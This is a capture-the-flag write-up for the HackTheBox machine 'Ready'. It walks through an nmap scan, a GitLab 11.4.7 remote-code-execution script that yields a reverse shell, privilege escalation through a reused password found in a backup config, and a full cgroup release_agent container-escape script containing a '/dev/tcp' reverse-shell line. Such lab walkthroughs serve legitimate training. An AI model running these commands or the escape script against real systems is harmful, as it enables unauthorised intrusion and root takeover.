Categories
HackTheBox Writeups

[HtB] – Ready

Hey guys, I'm back with another easy HackTheBox box write-up (well it's actually medium rated but easy it was).

First, let's scan for open ports :

nmap -A -T4 -p- 10.10.10.220 | tee scan.txt

  • -A : enables OS detection (-O), version scanning (-sV), script scanning (-sC) and traceroute (--traceroute)
  • -p- : nmap scans every port
  • -T4 : allows you to adjust the Timing Template (according to your bandwidth, and the speed you're seeking)

The interesting thing to notice is that there is no website available on port 80 which's usually the case. But there is one hosted on port 5080.

Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-28 16:11 CET
Nmap scan report for ready.htb (10.10.10.220)
Host is up (0.016s latency).
Not shown: 65533 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
|   256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
|_  256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
5080/tcp open  http    nginx
| http-robots.txt: 53 disallowed entries (15 shown)
| / /autocomplete/users /search /api /admin /profile 
| /dashboard /projects/new /groups/new /groups/*/edit /users /help 
|_/s/ /snippets/new /snippets/*/edit
| http-title: Sign in \xC2\xB7 GitLab
|_Requested resource was http://ready.htb:5080/users/sign_in
|_http-trane-info: Problem with XML parsing of /evox/about
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 66.07 seconds

You'll get the following connection form. It will bring some memories up for some of you 😉

If you created an account, and go to the help section you'll learn about the GitLab version that is used : 11.4.7. You'll notice in some cases a little red label stating "update asap". It's a good clue 🙂

Foothold

After some short googling, I found this python script that exploits a known CVE on this particular version.

┌─|Log_s [00:00] :~/Cyber/chall/machines/Ready 
└──╼ $ python3 gitlab_rce.py http://10.10.10.220:5080 10.10.14.239
Start a listener on port 42069 and hit enter (nc -vlnp 42069)

Start a listener in another terminal on port 42069 as prompted an hit enter.

$ rlwrap nc -lvp 42069
listening on [any] 42069 ...
connect to [10.10.14.239] from ready.htb [10.10.10.220] 57814
bash: cannot set terminal process group (518): Inappropriate ioctl for device
bash: no job control in this shell
[email protected]:~/gitlab-rails/working$ 

Here we go for the foothold.

Own User

You automatically get the user by doing cat /home/dude/user.txt
( told you it wasn't hard).

Own Root

This part is a little bit more tricky if you don't understand you're environment. You will often find software like GitLab running in a docker container, but if to be sure you can simply run LinPEAS.sh or LinEnum.sh. It will notify you if it detects being run in a docker.

I rapidly found a way to escape a docker, if the docker is running as root, and if you're root inside the docker (which we're currently not). So with that cleared, all we have to do is privesc to root in our current environment.

After some regular enumeration work, you'll find what you need in a backup file : cat /opt/backup/gitlab.rb | grep password

The admin is a password reuser (oooooh bad boy), so this line is interesting :

gitlab_rails['smtp_password'] = "wW59U!ZKMbG9+*#h"

Let's pop a real shell and try to connect as root :

@gitlab:/home/dude$ python3 -c "import pty;pty.spawn('/bin/bash')"
python3 -c "import pty;pty.spawn('/bin/bash')"
[email protected]:/home/dude$ su root
su root
Password: wW59U!ZKMbG9+*#h

[email protected]:/home/dude# id
id
uid=0(root) gid=0(root) groups=0(root)

The final step is to escape the docker. Here is a simple way that works here. Create the /tmp/cgrp folder. Create a bash script with the following content and run it (don't forget to replace my info with your own IP and PORT).

#! /bin/bash

mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x
 
echo 1 > /tmp/cgrp/x/notify_on_release
host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
echo "$host_path/cmd" > /tmp/cgrp/release_agent

#Reverse shell
echo '#!/bin/bash' > /cmd
echo "bash -i >& /dev/tcp/10.10.14.239/9999 0>&1" >> /cmd
chmod a+x /cmd

sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"
head /output

Finally, listen on the right port and run the script !

$ rlwrap nc -lvp 9999
listening on [any] 9999 ...
connect to [10.10.14.239] from ready.htb [10.10.10.220] 59432
bash: cannot set terminal process group (-1): Inappropriate ioctl for device
bash: no job control in this shell
[email protected]:/# id
id
uid=0(root) gid=0(root) groups=0(root)

Now a simple cat /root/root.txt will do the trick.

I hope you enjoyed, and see you for another write-up 😉